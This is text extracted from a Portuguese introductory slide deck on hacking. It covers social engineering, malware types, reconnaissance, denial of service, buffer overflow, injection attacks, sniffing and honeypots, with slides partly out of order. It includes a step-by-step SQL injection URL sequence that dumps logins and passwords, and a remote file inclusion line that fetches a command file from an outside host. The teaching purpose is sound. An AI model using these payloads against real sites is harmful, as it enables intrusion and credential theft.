Escolar Documentos
Profissional Documentos
Cultura Documentos
O termo Hacker
A engenharia social
Pragas Virtuais
Vulnerabilidades e ataques
Prática
O termo hacker
Toda informação
deve ser livre (pekka
himanem)
Lei de Linus
Sobrevivência
Social
Diversão
Hackers
Crackers
Phreakers
Engenharia Social
No Shell No C
Engenharia: Talento
Social: Comunicar
(sociedade)
A arte de enganar (Kevin D.
Mitnick)
”A engenharia social na
informática é a arte de
manipular a curiosidade das
pessoas para executarem
uma certa ação.”
Phishing
Phishing: Pescar
informações.
Phishing + Engenharia
social
Spam
”Você acaba de ganhar um
carro 0 km com o sorteio da
Tele cena! Clique aqui e
resgate agora o seu
prêmio!”
Phishing
Phishing
Phishing
Phishing
Phishing
A Engenharia social em pessoas
Trojans
Backdoors
Rootkits
Worms
Spywares
Trojans
Função: ”camuflar” o
arquivo suspeito dos
sistemas de proteções
(antivírus, firewall).
Geralmente combinados
com Trojans, Worms,
spywares.
Spywares
Função: Roubo de
informações (Senhas de
email, bancos, cartões de
créditos).
Keyloggers:
SMTP
FTP
PHP
Vulnerabilidades e Ataques
Fingerprint
Exploits
Negação de Serviço
Botnets
Buffer Overflow
XSS (Cross site scripting)
PHP Injection
SQL Injection
MITM (Man-in-the-Middle)
Honeypot
Fingerprint
Fingerprint: Levantamento
de informações
S.O
Portas
Serviços
Versões dos serviços
Por que realizar um
Fingerprint ?
Ferramentas: Nmap,
Nessus, Acunetix.
Exploits
Objetivo: Armazenar
recursos na máquina alvo.
3 way handshake
Syn>Syn+Ack>Ack
Syn: Recurso armazenado
Syn>Syn+Ack>???
Proteção: TCP Syn Cookie
Syn>Syn+Ack>Ack
Ack: Recurso armazenado
Udp Flood
Objetivo: estouro de um
array fixo da pilha do
aplicativo.
Quais as consequências ?
Mal funcionamento do
software
Sobrescrever em
endereços de memória
que não deveriam
Execução de código
malicioso
Buffer Overflow – Vulnerabilidade
MS09-067
XSS (Cross site scripting)
Explorando:
index.php?pagina=[código malicioso]
index.php?pagina=http://www.site.com/c
md.txt?
Como evitar ?
site.com/index.asp?id='
Erro:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the
character string ''.
/noticias/noticias.asp, line 112
site.com/index.asp?id=-1+order+by+1,2,3,4,5--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out
of range of the number of items in the select list.
/noticias/noticias.asp, line 112
site.com/index.asp?id=-1+union+select+1,2,3,4+from+usuarios--
Exibiu coluna 2
site.com/index.asp?id=-1+union+select+1,login,0x3a,senha,3,4
+from+usuarios--
SQL Injection (Correção)
Software: Valha
Honeypot.
Função: simula serviços
como Pop3, ftp, telnet,
no qual você consegue
observar em tempo real
a atividade do invasor.
Baixa interatividade
Honeynet
Honeynet é uma
máquina com uma
infraestrutura preparada
para receber invasores.
Uma máquina em tempo
real.
Alta interatividade.
Sniffing
Objetivo: Capturar
pacotes de uma rede
Local e decodifica-los
para quem está
utilizando-o.
Atua na camada de
Enlace (2 camada do
modelo OSI)
Arp Poison
Redes Internas
Wireshark, Iptraff,
Ethereal, Kismet
Conclusão
Prática
Referências
http://www.netpoint.com.br/ajuda/index.php?title=Sql_Injection
http://www.redehost.com.br/duvidas/protecao-contra-php-injection--138.aspx
http://www.cert.br/docs/whitepapers/honeypots-honeynets/
http://www.infosegura.eti.br/artigos/Ataques_de_Camada_2.pdf
http://mcpbrasil.com/integra.asp?id=199
http://www.cesarkallas.net/arquivos/apostilas/identificacao_passiva_so.pdf